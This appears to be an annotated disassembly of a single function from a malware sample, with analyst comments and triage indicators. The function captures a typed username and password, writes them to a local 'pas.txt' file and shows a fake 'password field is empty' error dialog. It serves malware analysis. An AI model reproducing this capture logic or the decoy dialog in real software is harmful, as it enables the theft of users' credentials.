d188878

malware1_funcb1

Feb 9th, 2019
  ; ---------------------------------------------------------------------
  ; Function 0049642C..004966F5 (debugger listing, 32-bit x86, Intel syntax).
  ;
  ; What the listing shows: two text values are fetched from the object
  ; passed in EAX (members +370 and +2F8), prefixed with "Username: " and
  ; "Password: ", and written between two "www.ourgodfather.com" marker
  ; lines to a file whose name ends in "/pas.txt". The values are written
  ; as read; no encoding or encryption step appears in this function.
  ;
  ; In:     EAX = object pointer (copied to EBX).
  ;         NOTE(review): passing arguments in EAX/EDX/ECX and the helper
  ;         call shapes look like Borland/Delphi register convention and
  ;         RTL; confirm against the binary.
  ; Locals: [EBP-4], [EBP-8], [EBP-1D8], [EBP-1DC], [EBP-1E0] are zeroed on
  ;         entry and handed to helpers by address (presumably managed
  ;         string slots). [EBP-1D4] is a buffer handed to 00402E14,
  ;         00402BB0, 0040500C and 00402EDC (presumably a text-file record).
  ; Scope:  no network call is visible here; the captured values go to a
  ;         local file only. Any upload would be in code outside this
  ;         listing. The exception handler 004966F6 and the continuation
  ;         004966FD also lie past the last line shown.
  ; Triage: strings on this page usable as static indicators are
  ;         "/pas.txt", "www.ourgodfather.com", "Username: ", "Password: "
  ;         and the dialog text ending in "Error Code: 8004882e".
  ; ---------------------------------------------------------------------
  ; Prologue: frame pointer, 0x1E0 bytes of locals, save EBX/ESI.
  1. 0049642C /. 55 PUSH EBP
  2. 0049642D |. 8BEC MOV EBP,ESP
  3. 0049642F |. 81C4 20FEFFFF ADD ESP,-1E0
  4. 00496435 |. 53 PUSH EBX
  5. 00496436 |. 56 PUSH ESI
  ; Zero the five pointer-sized locals before any helper can touch them.
  6. 00496437 |. 33C9 XOR ECX,ECX
  7. 00496439 |. 898D 20FEFFFF MOV DWORD PTR SS:[EBP-1E0],ECX
  8. 0049643F |. 898D 28FEFFFF MOV DWORD PTR SS:[EBP-1D8],ECX
  9. 00496445 |. 898D 24FEFFFF MOV DWORD PTR SS:[EBP-1DC],ECX
  10. 0049644B |. 894D FC MOV DWORD PTR SS:[EBP-4],ECX
  11. 0049644E |. 894D F8 MOV DWORD PTR SS:[EBP-8],ECX
  ; EBX = incoming object; ESI = pointer loaded from global 49A048. [ESI] is
  ; dereferenced below to reach a second object whose members are queried.
  12. 00496451 |. 8BD8 MOV EBX,EAX
  13. 00496453 |. 8B35 48A04900 MOV ESI,DWORD PTR DS:[49A048] ; Malware1.0049C058
  ; Link an exception registration record at FS:[0]: saved EBP, handler
  ; address 004966F6, previous record. Unlinked again at 004966C0.
  14. 00496459 |. 33C0 XOR EAX,EAX
  15. 0049645B |. 55 PUSH EBP
  16. 0049645C |. 68 F6664900 PUSH Malware1.004966F6
  17. 00496461 |. 64:FF30 PUSH DWORD PTR FS:[EAX]
  18. 00496464 |. 64:8920 MOV DWORD PTR FS:[EAX],ESP
  ; Empty-input check. 00453F60 takes EAX = member object, EDX = address of
  ; the output slot (presumably a get-text helper for a form control).
  ; Member +370 is later labelled "Username: " and +2F8 "Password: ".
  19. 00496467 |. 8D95 28FEFFFF LEA EDX,DWORD PTR SS:[EBP-1D8]
  20. 0049646D |. 8B83 70030000 MOV EAX,DWORD PTR DS:[EBX+370]
  21. 00496473 |. E8 E8DAFBFF CALL Malware1.00453F60
  22. 00496478 |. 83BD 28FEFFFF >CMP DWORD PTR SS:[EBP-1D8],0
  ; A non-empty first value skips the second check entirely, so the error
  ; dialog below appears only when BOTH values are empty.
  23. 0049647F |. 75 34 JNZ SHORT Malware1.004964B5
  24. 00496481 |. 8D95 24FEFFFF LEA EDX,DWORD PTR SS:[EBP-1DC]
  25. 00496487 |. 8B83 F8020000 MOV EAX,DWORD PTR DS:[EBX+2F8]
  26. 0049648D |. E8 CEDAFBFF CALL Malware1.00453F60
  27. 00496492 |. 83BD 24FEFFFF >CMP DWORD PTR SS:[EBP-1DC],0
  28. 00496499 |. 75 1A JNZ SHORT Malware1.004964B5
  ; Both empty: call 004322DC with EAX = message text, DL = 2, CX = word at
  ; 496704, one stack argument 0 (presumably a message-dialog helper), then
  ; jump to the common exit without writing anything.
  29. 0049649B |. 6A 00 PUSH 0 ; /Arg1 = 00000000
  30. 0049649D |. 66:8B0D 046749>MOV CX,WORD PTR DS:[496704] ; |
  31. 004964A4 |. B2 02 MOV DL,2 ; |
  32. 004964A6 |. B8 10674900 MOV EAX,Malware1.00496710 ; |ASCII "The password field is empty, please type your password and try again.
  33.  
  34. Error Code: 8004882e"
  35. 004964AB |. E8 2CBEF9FF CALL Malware1.004322DC ; \Malware1.004322DC
  36. 004964B0 |. E9 0B020000 JMP Malware1.004966C0
  ; At least one value present: set the byte pointed to by global 49A1F4.
  37. 004964B5 |> A1 F4A14900 MOV EAX,DWORD PTR DS:[49A1F4]
  38. 004964BA |. C600 01 MOV BYTE PTR DS:[EAX],1
  ; Recurring pattern from here on: load a member of the object at [ESI],
  ; call through slot +C8 of that member's first dword (its method table)
  ; and test AL. NOTE(review): presumably a boolean option/checkbox getter;
  ; confirm what slot +C8 is.
  ; If member +314 or +310 reports 1, call 00473920 on the object behind
  ; global 49A0B8.
  39. 004964BD |. 8B06 MOV EAX,DWORD PTR DS:[ESI]
  40. 004964BF |. 8B80 14030000 MOV EAX,DWORD PTR DS:[EAX+314]
  41. 004964C5 |. 8B10 MOV EDX,DWORD PTR DS:[EAX]
  42. 004964C7 |. FF92 C8000000 CALL DWORD PTR DS:[EDX+C8]
  43. 004964CD |. 3C 01 CMP AL,1
  44. 004964CF |. 74 14 JE SHORT Malware1.004964E5
  45. 004964D1 |. 8B06 MOV EAX,DWORD PTR DS:[ESI]
  46. 004964D3 |. 8B80 10030000 MOV EAX,DWORD PTR DS:[EAX+310]
  47. 004964D9 |. 8B10 MOV EDX,DWORD PTR DS:[EAX]
  48. 004964DB |. FF92 C8000000 CALL DWORD PTR DS:[EDX+C8]
  49. 004964E1 |. 3C 01 CMP AL,1
  50. 004964E3 |. 75 0C JNZ SHORT Malware1.004964F1
  51. 004964E5 |> A1 B8A04900 MOV EAX,DWORD PTR DS:[49A0B8]
  52. 004964EA |. 8B00 MOV EAX,DWORD PTR DS:[EAX]
  53. 004964EC |. E8 2FD4FDFF CALL Malware1.00473920
  ; If any of members +32C, +324, +328 reports 1 AND member +348 reports 1,
  ; call 00470344 on the object behind global 49A2A8.
  54. 004964F1 |> 8B06 MOV EAX,DWORD PTR DS:[ESI]
  55. 004964F3 |. 8B80 2C030000 MOV EAX,DWORD PTR DS:[EAX+32C]
  56. 004964F9 |. 8B10 MOV EDX,DWORD PTR DS:[EAX]
  57. 004964FB |. FF92 C8000000 CALL DWORD PTR DS:[EDX+C8]
  58. 00496501 |. 3C 01 CMP AL,1
  59. 00496503 |. 74 28 JE SHORT Malware1.0049652D
  60. 00496505 |. 8B06 MOV EAX,DWORD PTR DS:[ESI]
  61. 00496507 |. 8B80 24030000 MOV EAX,DWORD PTR DS:[EAX+324]
  62. 0049650D |. 8B10 MOV EDX,DWORD PTR DS:[EAX]
  63. 0049650F |. FF92 C8000000 CALL DWORD PTR DS:[EDX+C8]
  64. 00496515 |. 3C 01 CMP AL,1
  65. 00496517 |. 74 14 JE SHORT Malware1.0049652D
  66. 00496519 |. 8B06 MOV EAX,DWORD PTR DS:[ESI]
  67. 0049651B |. 8B80 28030000 MOV EAX,DWORD PTR DS:[EAX+328]
  68. 00496521 |. 8B10 MOV EDX,DWORD PTR DS:[EAX]
  69. 00496523 |. FF92 C8000000 CALL DWORD PTR DS:[EDX+C8]
  70. 00496529 |. 3C 01 CMP AL,1
  71. 0049652B |. 75 20 JNZ SHORT Malware1.0049654D
  72. 0049652D |> 8B06 MOV EAX,DWORD PTR DS:[ESI]
  73. 0049652F |. 8B80 48030000 MOV EAX,DWORD PTR DS:[EAX+348]
  74. 00496535 |. 8B10 MOV EDX,DWORD PTR DS:[EAX]
  75. 00496537 |. FF92 C8000000 CALL DWORD PTR DS:[EDX+C8]
  76. 0049653D |. 3C 01 CMP AL,1
  77. 0049653F |. 75 0C JNZ SHORT Malware1.0049654D
  78. 00496541 |. A1 A8A24900 MOV EAX,DWORD PTR DS:[49A2A8]
  79. 00496546 |. 8B00 MOV EAX,DWORD PTR DS:[EAX]
  80. 00496548 |. E8 F79DFDFF CALL Malware1.00470344
  ; Two single-argument calls on members +304 and +30C of the incoming
  ; object. Their effect is not visible in this listing.
  81. 0049654D |> 8B83 04030000 MOV EAX,DWORD PTR DS:[EBX+304]
  82. 00496553 |. E8 30DFFBFF CALL Malware1.00454488
  83. 00496558 |. 8B83 0C030000 MOV EAX,DWORD PTR DS:[EBX+30C]
  84. 0049655E |. E8 2DDFFBFF CALL Malware1.00454490
  ; Capture: fetch member +370 into [EBP-4] and member +2F8 into [EBP-8]
  ; using the same helper as the empty-input check.
  85. 00496563 |. 8D55 FC LEA EDX,DWORD PTR SS:[EBP-4]
  86. 00496566 |. 8B83 70030000 MOV EAX,DWORD PTR DS:[EBX+370]
  87. 0049656C |. E8 EFD9FBFF CALL Malware1.00453F60
  88. 00496571 |. 8D55 F8 LEA EDX,DWORD PTR SS:[EBP-8]
  89. 00496574 |. 8B83 F8020000 MOV EAX,DWORD PTR DS:[EBX+2F8]
  90. 0049657A |. E8 E1D9FBFF CALL Malware1.00453F60
  ; 00404C3C takes EAX = destination slot, EDX = first string, ECX = second
  ; string (presumably a three-operand concatenation, dest := EDX + ECX).
  ; Here it prefixes each captured value with its label, in place.
  91. 0049657F |. 8D45 FC LEA EAX,DWORD PTR SS:[EBP-4]
  92. 00496582 |. 8B4D FC MOV ECX,DWORD PTR SS:[EBP-4]
  93. 00496585 |. BA 78674900 MOV EDX,Malware1.00496778 ; ASCII "Username: "
  94. 0049658A |. E8 ADE6F6FF CALL Malware1.00404C3C
  95. 0049658F |. 8D45 F8 LEA EAX,DWORD PTR SS:[EBP-8]
  96. 00496592 |. 8B4D F8 MOV ECX,DWORD PTR SS:[EBP-8]
  97. 00496595 |. BA 8C674900 MOV EDX,Malware1.0049678C ; ASCII "Password: "
  98. 0049659A |. E8 9DE6F6FF CALL Malware1.00404C3C
  ; Output file name: the string behind global 49A170 with "/pas.txt"
  ; appended, stored in [EBP-1E0]. The base string is set elsewhere and is
  ; not visible here, so the directory has to come from dynamic analysis.
  99. 0049659F |. 8B15 70A14900 MOV EDX,DWORD PTR DS:[49A170] ; Malware1.0049C274
  100. 004965A5 |. 8B12 MOV EDX,DWORD PTR DS:[EDX]
  101. 004965A7 |. 8D85 20FEFFFF LEA EAX,DWORD PTR SS:[EBP-1E0]
  102. 004965AD |. B9 A0674900 MOV ECX,Malware1.004967A0 ; ASCII "/pas.txt"
  103. 004965B2 |. E8 85E6F6FF CALL Malware1.00404C3C
  ; File setup on the buffer at [EBP-1D4]: 00402E14 receives the buffer and
  ; the file name, 00402BB0 the buffer alone. NOTE(review): presumably
  ; assign-name then open; whether the file is truncated or appended to
  ; depends on what 00402BB0 is. Confirm. 004028BC follows every file call
  ; below with no arguments (presumably an I/O result check).
  104. 004965B7 |. 8B95 20FEFFFF MOV EDX,DWORD PTR SS:[EBP-1E0]
  105. 004965BD |. 8D85 2CFEFFFF LEA EAX,DWORD PTR SS:[EBP-1D4]
  106. 004965C3 |. E8 4CC8F6FF CALL Malware1.00402E14
  107. 004965C8 |. 8D85 2CFEFFFF LEA EAX,DWORD PTR SS:[EBP-1D4]
  108. 004965CE |. E8 DDC5F6FF CALL Malware1.00402BB0
  109. 004965D3 |. E8 E4C2F6FF CALL Malware1.004028BC
  ; Four records go to the file in this order: marker string, labelled
  ; username, labelled password, marker string. Each is 0040500C (EAX =
  ; file buffer, EDX = string) followed by 00403458 and 004028BC
  ; (presumably write-string, end-of-line, I/O check).
  110. 004965D8 |. BA B4674900 MOV EDX,Malware1.004967B4 ; ASCII "www.ourgodfather.com"
  111. 004965DD |. 8D85 2CFEFFFF LEA EAX,DWORD PTR SS:[EBP-1D4]
  112. 004965E3 |. E8 24EAF6FF CALL Malware1.0040500C
  113. 004965E8 |. E8 6BCEF6FF CALL Malware1.00403458
  114. 004965ED |. E8 CAC2F6FF CALL Malware1.004028BC
  115. 004965F2 |. 8B55 FC MOV EDX,DWORD PTR SS:[EBP-4]
  116. 004965F5 |. 8D85 2CFEFFFF LEA EAX,DWORD PTR SS:[EBP-1D4]
  117. 004965FB |. E8 0CEAF6FF CALL Malware1.0040500C
  118. 00496600 |. E8 53CEF6FF CALL Malware1.00403458
  119. 00496605 |. E8 B2C2F6FF CALL Malware1.004028BC
  120. 0049660A |. 8B55 F8 MOV EDX,DWORD PTR SS:[EBP-8]
  121. 0049660D |. 8D85 2CFEFFFF LEA EAX,DWORD PTR SS:[EBP-1D4]
  122. 00496613 |. E8 F4E9F6FF CALL Malware1.0040500C
  123. 00496618 |. E8 3BCEF6FF CALL Malware1.00403458
  124. 0049661D |. E8 9AC2F6FF CALL Malware1.004028BC
  125. 00496622 |. BA B4674900 MOV EDX,Malware1.004967B4 ; ASCII "www.ourgodfather.com"
  126. 00496627 |. 8D85 2CFEFFFF LEA EAX,DWORD PTR SS:[EBP-1D4]
  127. 0049662D |. E8 DAE9F6FF CALL Malware1.0040500C
  128. 00496632 |. E8 21CEF6FF CALL Malware1.00403458
  129. 00496637 |. E8 80C2F6FF CALL Malware1.004028BC
  ; Last call on the file buffer (presumably close), then the I/O check.
  130. 0049663C |. 8D85 2CFEFFFF LEA EAX,DWORD PTR SS:[EBP-1D4]
  131. 00496642 |. E8 95C8F6FF CALL Malware1.00402EDC
  132. 00496647 |. E8 70C2F6FF CALL Malware1.004028BC
  ; If member +374 reports 1, run 004961EC (body not in this listing).
  133. 0049664C |. 8B06 MOV EAX,DWORD PTR DS:[ESI]
  134. 0049664E |. 8B80 74030000 MOV EAX,DWORD PTR DS:[EAX+374]
  135. 00496654 |. 8B10 MOV EDX,DWORD PTR DS:[EAX]
  136. 00496656 |. FF92 C8000000 CALL DWORD PTR DS:[EDX+C8]
  137. 0049665C |. 3C 01 CMP AL,1
  138. 0049665E |. 75 05 JNZ SHORT Malware1.00496665
  139. 00496660 |. E8 87FBFFFF CALL Malware1.004961EC
  ; 00453F90 on member +2F8 with EDX = 0 (presumably set-text with an empty
  ; string, i.e. the password field is blanked after capture).
  140. 00496665 |> 33D2 XOR EDX,EDX
  141. 00496667 |. 8B83 F8020000 MOV EAX,DWORD PTR DS:[EBX+2F8]
  142. 0049666D |. E8 1ED9FBFF CALL Malware1.00453F90
  ; If member +348 reports non-zero, go straight to the exit.
  143. 00496672 |. 8B06 MOV EAX,DWORD PTR DS:[ESI]
  144. 00496674 |. 8B80 48030000 MOV EAX,DWORD PTR DS:[EAX+348]
  145. 0049667A |. 8B10 MOV EDX,DWORD PTR DS:[EAX]
  146. 0049667C |. FF92 C8000000 CALL DWORD PTR DS:[EDX+C8]
  147. 00496682 |. 84C0 TEST AL,AL
  148. 00496684 |. 75 3A JNZ SHORT Malware1.004966C0
  ; Otherwise call 004322DC again, this time with the text behind global
  ; 499E08 and the same DL/CX/stack arguments as the first dialog.
  ; DEC EAX / JNZ continues only when the helper returned exactly 1.
  149. 00496686 |. 6A 00 PUSH 0 ; /Arg1 = 00000000
  150. 00496688 |. A1 089E4900 MOV EAX,DWORD PTR DS:[499E08] ; |
  151. 0049668D |. 8B00 MOV EAX,DWORD PTR DS:[EAX] ; |
  152. 0049668F |. 66:8B0D 046749>MOV CX,WORD PTR DS:[496704] ; |
  153. 00496696 |. B2 02 MOV DL,2 ; |
  154. 00496698 |. E8 3FBCF9FF CALL Malware1.004322DC ; \Malware1.004322DC
  155. 0049669D |. 48 DEC EAX
  156. 0049669E |. 75 20 JNZ SHORT Malware1.004966C0
  ; Return value was 1: if member +32C reports zero, call 00473920 on the
  ; object behind global 49A0B8 (the same call as at 004964EC).
  157. 004966A0 |. 8B06 MOV EAX,DWORD PTR DS:[ESI]
  158. 004966A2 |. 8B80 2C030000 MOV EAX,DWORD PTR DS:[EAX+32C]
  159. 004966A8 |. 8B10 MOV EDX,DWORD PTR DS:[EAX]
  160. 004966AA |. FF92 C8000000 CALL DWORD PTR DS:[EDX+C8]
  161. 004966B0 |. 84C0 TEST AL,AL
  162. 004966B2 |. 75 0C JNZ SHORT Malware1.004966C0
  163. 004966B4 |. A1 B8A04900 MOV EAX,DWORD PTR DS:[49A0B8]
  164. 004966B9 |. 8B00 MOV EAX,DWORD PTR DS:[EAX]
  165. 004966BB |. E8 60D2FDFF CALL Malware1.00473920
  ; Common exit: unlink the exception record. POP EDX takes the previous
  ; FS:[0] value; the two POP ECX discard the handler address and the
  ; saved EBP pushed at 0049645B..00496461.
  166. 004966C0 |> 33C0 XOR EAX,EAX
  167. 004966C2 |. 5A POP EDX
  168. 004966C3 |. 59 POP ECX
  169. 004966C4 |. 59 POP ECX
  170. 004966C5 |. 64:8910 MOV DWORD PTR FS:[EAX],EDX
  ; Push 004966FD so that the RETN below continues there (past the end of
  ; this listing, where the real epilogue presumably sits).
  171. 004966C8 |. 68 FD664900 PUSH Malware1.004966FD
  ; Cleanup of the locals. 00404930 gets one slot; 00404954 gets a slot
  ; address plus EDX = 2, which covers [EBP-1DC]/[EBP-1D8] and then
  ; [EBP-8]/[EBP-4] (presumably string release, single and array form).
  ; 004966CD is marked as a jump target, presumably reached from the
  ; handler at 004966F6 as well.
  172. 004966CD |> 8D85 20FEFFFF LEA EAX,DWORD PTR SS:[EBP-1E0]
  173. 004966D3 |. E8 58E2F6FF CALL Malware1.00404930
  174. 004966D8 |. 8D85 24FEFFFF LEA EAX,DWORD PTR SS:[EBP-1DC]
  175. 004966DE |. BA 02000000 MOV EDX,2
  176. 004966E3 |. E8 6CE2F6FF CALL Malware1.00404954
  177. 004966E8 |. 8D45 F8 LEA EAX,DWORD PTR SS:[EBP-8]
  178. 004966EB |. BA 02000000 MOV EDX,2
  179. 004966F0 |. E8 5FE2F6FF CALL Malware1.00404954
  180. 004966F5 \. C3 RETN